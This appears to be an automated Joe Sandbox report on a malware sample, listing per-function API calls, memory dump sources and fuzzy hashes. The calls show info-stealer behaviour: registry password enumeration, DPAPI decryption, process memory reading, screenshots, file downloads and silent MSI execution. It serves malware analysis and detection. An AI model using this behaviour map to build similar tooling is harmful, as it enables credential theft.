Instruction Fuzzy Hash: AA91C270640B009FD7309FA4DC84AAA37BAEB95705F50942BF805877A1EBB9DD50CBD2

Function 0040BCE9 Relevance: 18.2, APIs: 12, Instructions: 249stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 0040BD0F
lstrlenA.KERNEL32(00000000), ref: 0040BD42
lstrcpy.KERNEL32(00000000,00000000), ref: 0040BD6C
lstrcatA.KERNEL32(00000000,00000000), ref: 0040BD74
lstrcpy.KERNEL32(00000000,00000000), ref: 0040BD9C
lstrlenA.KERNEL32(0043509C), ref: 0040BE13

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 3b66287a07ebacd2529adab9549b2e3bbf352f1bbbc10a604505cc36abde3a7d
Instruction ID: 76368cc7b8b4fa27ce7ffa11b26ea8b40865ffa98968743eda1335703526e589
Opcode Fuzzy Hash: 3b66287a07ebacd2529adab9549b2e3bbf352f1bbbc10a604505cc36abde3a7d
Instruction Fuzzy Hash: B4A13D71A012058FCB14DF29C949A9BB7B1EF44304F14847AE405AB3E1DB79DC42CBD8

Function 009D7977 Relevance: 18.2, APIs: 12, Instructions: 202stringregistrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 009D79AC
RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 009D79F1
strlen.MSVCRT ref: 009D7A25
StrStrA.SHLWAPI(?,0043508C), ref: 009D7A5F
strlen.MSVCRT ref: 009D7AF4

Part of subcall function 009D78F7: GetProcessHeap.KERNEL32(00000008,00000400), ref: 009D7905
Part of subcall function 009D78F7: RtlAllocateHeap.NTDLL(00000000), ref: 009D790C
Part of subcall function 009D78F7: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 009D7934
Part of subcall function 009D78F7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 009D7954
Part of subcall function 009D78F7: LocalFree.KERNEL32(?), ref: 009D795E

strcpy_s.MSVCRT ref: 009D7A88
GetProcessHeap.KERNEL32(00000000,00000000), ref: 009D7A93
HeapFree.KERNEL32(00000000), ref: 009D7A9A
strlen.MSVCRT ref: 009D7AA7
strcpy_s.MSVCRT ref: 009D7AD1
strlen.MSVCRT ref: 009D7B1B
RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 009D7BDC

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: Heapstrlen$EnumFreeProcessValuestrcpy_s$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
String ID:
API String ID: 225686516-0
Opcode ID: 14964dbc208ebe2bd5570b721c02be0e9f6531da3a0e9e1e01ace35e59106e74
Instruction ID: 1008640da40842b6333d5c40f1c5c1b1dc7c04958e332b3a0753ad64280539de
Opcode Fuzzy Hash: 14964dbc208ebe2bd5570b721c02be0e9f6531da3a0e9e1e01ace35e59106e74
Instruction Fuzzy Hash: B5811CB1D002199FCB10DF94DC84ADEFBB9EF48304F1085AAE509A7250EB759A85CBA1

Function 009EEAE7 Relevance: 18.2, APIs: 12, Instructions: 200stringCOMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 009EEB35
lstrcpy.KERNEL32(00000000,?), ref: 009EEB67
lstrcat.KERNEL32(?,00000000), ref: 009EEB73
lstrcat.KERNEL32(?,004354E4), ref: 009EEB8A
SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 009EEBF3
lstrcpy.KERNEL32(00000000,?), ref: 009EEC27
lstrcat.KERNEL32(?,00000000), ref: 009EEC33
lstrcat.KERNEL32(?,00435504), ref: 009EEC4A
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 009EECB8
lstrcpy.KERNEL32(00000000,?), ref: 009EECE9
lstrcat.KERNEL32(?,00000000), ref: 009EECF5
lstrcat.KERNEL32(?,00435518), ref: 009EED0C

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcat$FolderPathlstrcpy
String ID:
API String ID: 818526691-0
Opcode ID: 334e6dd0bb3a256dce1f211927443b096a94995497771f00d173ec70529dc1f7
Instruction ID: 36f8c1d72dafcda47e664eb61dbabdbe734509f7513e2f169e515f1a4d8d6164
Opcode Fuzzy Hash: 334e6dd0bb3a256dce1f211927443b096a94995497771f00d173ec70529dc1f7
Instruction Fuzzy Hash: 2761F871644344ABD324EF60DC46FEE77A5EFC8700F50881AB68997291DBB4D908CB96

Function 00418240 Relevance: 18.2, APIs: 12, Instructions: 173stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00418263
lstrlenA.KERNEL32(00000000), ref: 0041829C
lstrcpy.KERNEL32(00000000,00000000), ref: 004182D3
lstrlenA.KERNEL32(00000000), ref: 004182F0
lstrcpy.KERNEL32(00000000,00000000), ref: 00418327
lstrlenA.KERNEL32(00000000), ref: 00418344
lstrcpy.KERNEL32(00000000,00000000), ref: 0041837B
lstrlenA.KERNEL32(00000000), ref: 00418398
lstrcpy.KERNEL32(00000000,00000000), ref: 004183C7
lstrlenA.KERNEL32(00000000), ref: 004183E1
lstrcpy.KERNEL32(00000000,00000000), ref: 00418410
strtok_s.MSVCRT ref: 0041842A

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$strtok_s
String ID:
API String ID: 2211830134-0
Opcode ID: 479635f4f195f76c08dbf8a3615428a40a852f8c8e2790974ea812ab78c6037d
Instruction ID: 84294ead90c4b52274de6bcb271b081bded899c4d10f8e28530b9caff154e1d2
Opcode Fuzzy Hash: 479635f4f195f76c08dbf8a3615428a40a852f8c8e2790974ea812ab78c6037d
Instruction Fuzzy Hash: F3516F716006139BDB149F39D948AABB7A5EF04340F10412AEC05E7384EF78E991CBE4

Function 009F25E7 Relevance: 16.7, APIs: 11, Instructions: 229stringCOMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00064000,?,00000000), ref: 009F25F8
lstrcpy.KERNEL32(00000000,0042D01C), ref: 009F2633
OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 009F2644
memset.MSVCRT ref: 009F266C
ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00000208,00000000), ref: 009F26C3
lstrlen.KERNEL32(00000000), ref: 009F26D0
lstrcpy.KERNEL32(00000000,00000000), ref: 009F2757
lstrlen.KERNEL32(00000000), ref: 009F275E
strlen.MSVCRT ref: 009F2782
memset.MSVCRT ref: 009F280C
??_V@YAXPAX@Z.MSVCRT(009F28C8), ref: 009F2859

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: Processlstrcpylstrlenmemset$MemoryOpenReadstrlen
String ID:
API String ID: 311138045-0
Opcode ID: 3dad72c2da892f3080a59da44b1c2af1ce4d3e6b4a562fa2674e328277ba50e0
Instruction ID: 22ebb8145982e5eeed5956b89e5e2a37107b5a853eb7e7999834f562216a4297
Opcode Fuzzy Hash: 3dad72c2da892f3080a59da44b1c2af1ce4d3e6b4a562fa2674e328277ba50e0
Instruction Fuzzy Hash: 7181A370E003099BDB24DF94DC44BAEB7B9EF84314F248079E605A7381EB79A942CF95

Function 009F4427 Relevance: 16.7, APIs: 11, Instructions: 178COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 009F44CB
GetDesktopWindow.USER32 ref: 009F44D5
GetWindowRect.USER32(00000000,?), ref: 009F44E3
SelectObject.GDI32(00000000,00000000), ref: 009F451A
GetHGlobalFromStream.COMBASE(?,?), ref: 009F459C
GlobalLock.KERNEL32(?), ref: 009F45A7
GlobalSize.KERNEL32(?), ref: 009F45B6

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
String ID:
API String ID: 1264946473-0
Opcode ID: f1d89ebb8a1d82e9856d53e6c9ad6d898912e967da030e87eb5b05a88891f30c
Instruction ID: c3b0a209ffb3519938b826d3e0c36c3d6c8bc4c1acadc54356903c50d8d17b81
Opcode Fuzzy Hash: f1d89ebb8a1d82e9856d53e6c9ad6d898912e967da030e87eb5b05a88891f30c
Instruction Fuzzy Hash: A3511AB1114344AFD310EF64DC89EABBBE9EF89714F00491EFA5593250DB74E905CBA2

Function 00406A10 Relevance: 16.6, APIs: 11, Instructions: 127networkfilestringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 00406A3F
InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 00406A6C
StrCmpCA.SHLWAPI(?,00A7FF78), ref: 00406A8A
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00406AAA
CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406AC8
InternetReadFile.WININET(00000000,?,00000400,?), ref: 00406AE1
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00406B06
InternetReadFile.WININET(00000000,?,00000400,?), ref: 00406B30
CloseHandle.KERNEL32(00000000), ref: 00406B50
InternetCloseHandle.WININET(00000000), ref: 00406B57
InternetCloseHandle.WININET(?), ref: 00406B61

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
String ID:
API String ID: 2500263513-0
Opcode ID: 885081f6fd0acedf355e9bb4124bd6bae7afd19d039d18dcdc55a63b4105ae60
Instruction ID: 214ef142a420c546876de0997919582a0985ebf66699d200bad1b39cea3fe35b
Opcode Fuzzy Hash: 885081f6fd0acedf355e9bb4124bd6bae7afd19d039d18dcdc55a63b4105ae60
Instruction Fuzzy Hash: D2417EB1B00215ABDB20DF64DC49FAE77B9AB44704F104569FA05F72C0DBB4AA418BA8

Function 009D6C77 Relevance: 16.6, APIs: 11, Instructions: 127networkfilestringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 009D6CA6
InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 009D6CD3
StrCmpCA.SHLWAPI(?,00638C80), ref: 009D6CF1
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 009D6D11
CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 009D6D2F
InternetReadFile.WININET(00000000,?,00000400,?), ref: 009D6D48
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 009D6D6D
InternetReadFile.WININET(00000000,?,00000400,?), ref: 009D6D97
CloseHandle.KERNEL32(00000000), ref: 009D6DB7
InternetCloseHandle.WININET(00000000), ref: 009D6DBE
InternetCloseHandle.WININET(?), ref: 009D6DC8

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
String ID:
API String ID: 2500263513-0
Opcode ID: cc38f937b6d9044345b358c1caff838f268f9b3664d4dee0a204f6f11099f684
Instruction ID: 48690801162dcb1ea9cfd74751384dc0a5bf3bab039a6f433e9f6ec2e2cd7346
Opcode Fuzzy Hash: cc38f937b6d9044345b358c1caff838f268f9b3664d4dee0a204f6f11099f684
Instruction Fuzzy Hash: 85415CB1A40215AFDB20DF64DC45FAE77BEEB54700F108459FA05E7280DF74AA448BA4

Function 009F4A67 Relevance: 16.5, APIs: 11, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(0043573C,?,009E79A8), ref: 009F4A6D
GetProcAddress.KERNEL32(00000000,00435748), ref: 009F4A83
GetProcAddress.KERNEL32(00000000,00435750), ref: 009F4A94
GetProcAddress.KERNEL32(00000000,0043575C), ref: 009F4AA5
GetProcAddress.KERNEL32(00000000,00435768), ref: 009F4AB6
GetProcAddress.KERNEL32(00000000,00435770), ref: 009F4AC7
GetProcAddress.KERNEL32(00000000,0043577C), ref: 009F4AD8
GetProcAddress.KERNEL32(00000000,00435784), ref: 009F4AE9
GetProcAddress.KERNEL32(00000000,0043578C), ref: 009F4AFA
GetProcAddress.KERNEL32(00000000,0043579C), ref: 009F4B0B
GetProcAddress.KERNEL32(00000000,004357A8), ref: 009F4B1C

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: f2223fcb320c708e67ee859b9f5f9b1d6605f49617afa15cb912c6ce6d96c9dc
Instruction ID: 1513aacd4e648272eb2169e48f2824864872acbe43933b002d938297e610fd22
Opcode Fuzzy Hash: f2223fcb320c708e67ee859b9f5f9b1d6605f49617afa15cb912c6ce6d96c9dc
Instruction Fuzzy Hash: 3911A576951720EF8714AFB5AD4DA9A3ABABA0E70AB14381BF151D3160DBF84004DFE4

Function 004180E0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 112stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00418105
lstrlenA.KERNEL32(00000000,?,?,?,?,?,0042093B), ref: 0041814B
lstrcpy.KERNEL32(00000000,00000000), ref: 0041817A
StrCmpCA.SHLWAPI(00000000,00435204,?,?,?,?,?,0042093B), ref: 00418192
lstrlenA.KERNEL32(00000000,?,?,?,?,?,0042093B), ref: 004181D0
lstrcpy.KERNEL32(00000000,00000000), ref: 004181FF
strtok_s.MSVCRT ref: 0041820F

Strings

fplugins, xrefs: 004180E6
;B, xrefs: 004180F1, 00418209, 004180FB, 0041820C

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlenstrtok_s
String ID: ;B$fplugins
API String ID: 3280532728-1193078497
Opcode ID: 713ed03d311a4750fa88e0bed59657df25361087ac739758ea01ec1891f1f295
Instruction ID: 7bc27923b6a5a417a1ea9fc553f6de9f23466f0c50f763b4e3e6f257422fb611
Opcode Fuzzy Hash: 713ed03d311a4750fa88e0bed59657df25361087ac739758ea01ec1891f1f295
Instruction Fuzzy Hash: 2741A275600206AFCB21DF68D948BABBBF4EF44700F11415EE855E7254EF78D981CB94

Function 004079A0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 109stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00407710: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00407745
Part of subcall function 00407710: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0040778A
Part of subcall function 00407710: strlen.MSVCRT ref: 004077BE
Part of subcall function 00407710: StrStrA.SHLWAPI(?,Password), ref: 004077F8
Part of subcall function 00407710: strcpy_s.MSVCRT ref: 00407821
Part of subcall function 00407710: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040782C
Part of subcall function 00407710: HeapFree.KERNEL32(00000000), ref: 00407833
Part of subcall function 00407710: strlen.MSVCRT ref: 00407840

lstrcatA.KERNEL32(00000000,0043509C), ref: 004079D0
lstrcatA.KERNEL32(00000000,?), ref: 004079FD
lstrcatA.KERNEL32(00000000, : ), ref: 00407A0F
lstrcatA.KERNEL32(00000000,?), ref: 00407A30
wsprintfA.USER32 ref: 00407A50
lstrcpy.KERNEL32(00000000,?), ref: 00407A79
lstrcatA.KERNEL32(00000000,00000000), ref: 00407A87
lstrcatA.KERNEL32(00000000,0043509C), ref: 00407AA0

Strings

: , xrefs: 00407A09

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcat$Heapstrlen$EnumFreeOpenProcessValuelstrcpystrcpy_swsprintf
String ID: :
API String ID: 2460923012-3653984579
Opcode ID: f031ef58faa457096bf95d298a055532e700362941ca8dcdb5c710b34acc3087
Instruction ID: 0800d7a34e1c09264d13db2801d63b4130211ebfed734ffac9e47d0e74890df3
Opcode Fuzzy Hash: f031ef58faa457096bf95d298a055532e700362941ca8dcdb5c710b34acc3087
Instruction Fuzzy Hash: 51318672E04214AFCB14DB68DC449AFB77ABB84310B14552AF606A3350DB79B941CFE5

Function 009EC9D5 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 127stringCOMMON

Download Yara Rule

APIs

Part of subcall function 009F75A7: lstrlen.KERNEL32(------,009D5D82), ref: 009F75B2
Part of subcall function 009F75A7: lstrcpy.KERNEL32(00000000), ref: 009F75D6
Part of subcall function 009F75A7: lstrcat.KERNEL32(?,------), ref: 009F75E0

Part of subcall function 009F7517: lstrcpy.KERNEL32(00000000), ref: 009F7545

lstrcpy.KERNEL32(00000000,?), ref: 009ECA1C
lstrcpy.KERNEL32(00000000,?), ref: 009ECA45
ShellExecuteEx.SHELL32(0000003C), ref: 009ECB38

Strings

.msi, xrefs: 009EC9D5
/i ", xrefs: 009ECA53
/passive, xrefs: 009ECAC0
(QC, xrefs: 009ECA9C
<, xrefs: 009ECAF8

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy$ExecuteShelllstrcatlstrlen
String ID: /i "$ /passive$(QC$.msi$<
API String ID: 619169029-3696510191
Opcode ID: 33cce934c145ca00de03e06ac9b7a6d0c7286c59f82434367499e6814e11012c
Instruction ID: d5dca2793c180d509505e509627524028da1d654905497cdb692dc5ab902e2c2
Opcode Fuzzy Hash: 33cce934c145ca00de03e06ac9b7a6d0c7286c59f82434367499e6814e11012c
Instruction Fuzzy Hash: 3B418071D102998FCB10EFA8C882AADBBB5AF88305F14887AE545E7311DB74DD46CB40

Function 009F9504 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 009F9510

Part of subcall function 009F8A96: __getptd_noexit.LIBCMT ref: 009F8A99
Part of subcall function 009F8A96: __amsg_exit.LIBCMT ref: 009F8AA6

__amsg_exit.LIBCMT ref: 009F9530
__lock.LIBCMT ref: 009F9540
InterlockedDecrement.KERNEL32(?), ref: 009F955D
free.MSVCRT ref: 009F9570
InterlockedIncrement.KERNEL32(XuC), ref: 009F9588

Strings

XuC, xrefs: 009F9576, 009F957E, 009F9587
XuC, xrefs: 009F9567

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
String ID: XuC$XuC
API String ID: 634100517-965221565
Opcode ID: 0f488bded4a2284775a0cad491dd4ea20a2d1d9719508126ea45b82ab1ed90ec
Instruction ID: f48fff4ba4a23ad6a7fcbe16f009385764187fd3e422715cee27e0d3fb2f2aa8
